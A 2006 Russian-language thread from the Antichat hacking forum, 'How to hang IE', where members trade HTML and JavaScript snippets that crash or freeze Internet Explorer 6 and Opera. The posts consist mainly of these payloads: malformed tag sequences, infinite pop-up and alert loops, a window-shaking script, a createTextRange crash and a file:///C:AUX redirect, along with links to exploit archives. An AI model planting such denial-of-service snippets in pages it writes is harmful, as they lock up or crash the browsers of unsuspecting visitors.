HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как повесить IE
  #1  
Старый 15.07.2006, 19:01
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
С нами: 10531106

Репутация: 354


Smile Как повесить IE

Я увидел что в знаменитом браузере Internet explorer сюществует полно багов, поэтому я подумал что это может быть не плохо если я открою топик в котором каждый будет описывать разные баги которые существуют в браузере Internet explorer .

Правила публикации багов очень просты:

1. Расскажите немного про баг.
2. Кем был он найден.





Я начинаю.

Баг в IE 6

Этот баг позволяет сделать DoS (Denial of Service или Отказ от Обслуживания) атаку на IE 6 пока он не рухнет.
Как я слышал он был найден командой FIRST.
Код:
Код:
# <acronym><dd><h5><applet></caption></applet></h1>
Или просто напишите это:
Код:
<table datasrc=".">

Последний раз редактировалось dracula4ever; 15.07.2006 в 21:38..
 
Ответить с цитированием

  #2  
Старый 15.07.2006, 19:53
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
С нами: 10752806

Репутация: 1202


По умолчанию

http://browserfun.blogspot.com/

новейшие сплоиты каждый день
 
Ответить с цитированием

  #3  
Старый 15.07.2006, 20:34
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
С нами: 10531106

Репутация: 354


По умолчанию

Вот еще один DoS.
Был найден юзером jsz.
Этот баг загружает браузер пока он не рухает.

Код:
Код:
<meta http-equiv="refresh" content="0;url=mkmk.html">
<SCRIPT LANGUAGE="javascript">
<!--
window.open ('ms-ie.html')
-->
</SCRIPT>
 
Ответить с цитированием

  #4  
Старый 15.07.2006, 21:23
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

Дракула, браузерный убийца...+))))
http://www.milw0rm.com/search.php?dong=Internet+Explorer
__________________
 
Ответить с цитированием

  #5  
Старый 15.07.2006, 22:14
Дикс
Познавший АНТИЧАТ
Регистрация: 16.04.2006
Сообщений: 1,488
С нами: 10562786

Репутация: 537


По умолчанию

<meta http-equiv='refresh' content='0; index.php'>
бесконечный редирект страницы на самую себя.
был найден мной. две минуты назад. я как раз зашёл сюда чтобы об этом написать
 
Ответить с цитированием

  #6  
Старый 16.07.2006, 11:16
Eco[L]og
Новичок
Регистрация: 02.07.2006
Сообщений: 24
С нами: 10451885

Репутация: 14
По умолчанию

Вот сразу 3 бага для ослика. Кто нашел незнаю.

Первый:
Открывает множество окон
Код HTML:
<script>
now();
function now() {for (i=1;i>0;i++){open('index.htm','new'+i);}}
</script>
Второй:
Выводит сообщение ERROR и делает открытое окно недоступным
Код HTML:
<script>
{ while ( true ) window.alert('ERROR !'); } 
</script>
Третий:
трясет окно Обозревателя
Код HTML:
<body onloaD="MM_callJS('shake();')">
<script language="JavaScript1.2">
function shake() {
n=100;
for (i = 10; i > 0; i--) {
for (j = n; j > 0; j--) {
self.moveBy(0,i);
self.moveBy(i,0);
self.moveBy(0,-i);
self.moveBy(-i,0);
}
}
}
function MM_callJS(jsStr) { file://v2.0
return eval(jsStr)
}
</script> 
 
Ответить с цитированием

  #7  
Старый 16.07.2006, 11:36
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
С нами: 10531106

Репутация: 354


По умолчанию

Eco[L]og так держать =)
Я продолжаю.


Этот баг был найден Stelian Ene и он работает в IE 6.
Ксожелению я про него ничего не могу рассказать.

Код:
<input type="checkbox" id='c'>
<script>
        r=document.getElementById("c");
        a=r.createTextRange();
</script>
 
Ответить с цитированием

  #8  
Старый 16.07.2006, 11:41
bandera
Познающий
Регистрация: 02.06.2006
Сообщений: 66
С нами: 10495365

Репутация: 69
По умолчанию

Цитата:
Сообщение от Eco[L]og  
Вот сразу 3 бага для ослика. Кто нашел незнаю.

Первый:
Открывает множество окон
Код HTML:
<script>
now();
function now() {for (i=1;i>0;i++){open('index.htm','new'+i);}}
</script>
Второй:
Выводит сообщение ERROR и делает открытое окно недоступным
Код HTML:
<script>
{ while ( true ) window.alert('ERROR !'); } 
</script>
Третий:
трясет окно Обозревателя
Код HTML:
<body onloaD="MM_callJS('shake();')">
<script language="JavaScript1.2">
function shake() {
n=100;
for (i = 10; i > 0; i--) {
for (j = n; j > 0; j--) {
self.moveBy(0,i);
self.moveBy(i,0);
self.moveBy(0,-i);
self.moveBy(-i,0);
}
}
}
function MM_callJS(jsStr) { file://v2.0
return eval(jsStr)
}
</script> 
Гы =))) Это баги? Да это просто скрипты

Последний раз редактировалось bandera; 16.07.2006 в 11:48..
 
Ответить с цитированием

  #9  
Старый 17.07.2006, 20:36
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами: 10485026

Репутация: 1879


По умолчанию

Бегущие полосы вешающите Ie
Код:
<HTML>
<BODY>
<SCRIPT>
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2){
x = 0;
} 
}
</SCRIPT>
</BODY>
</HTML>
это только для IE
А вот эта штука оперу вешает.
Код:
<script>
parent.location="file:///C:AUX";
</script>
 
Ответить с цитированием

  #10  
Старый 18.07.2006, 07:35
Rubick
Новичок
Регистрация: 13.07.2006
Сообщений: 6
С нами: 10435682

Репутация: 1
По умолчанию

Народ, а не кто не копал дальше последнюю статью в ][ про новую уязвимость в ишаке? Там насколько я помню дело встало за написанием плагина к Ольке, чтобы откапать в каком именно месте идет переполнение, без этого ни экплоита ни червячка не напишешь. Это насколько я понимаю настоящая уязвимость.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как стать хакером! foreva Болталка 19 12.12.2007 00:12
Мой ржачный разговор в аське с кем-то вроде как с античата, как я подумал Дрэгги Болталка 21 22.07.2007 12:33



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.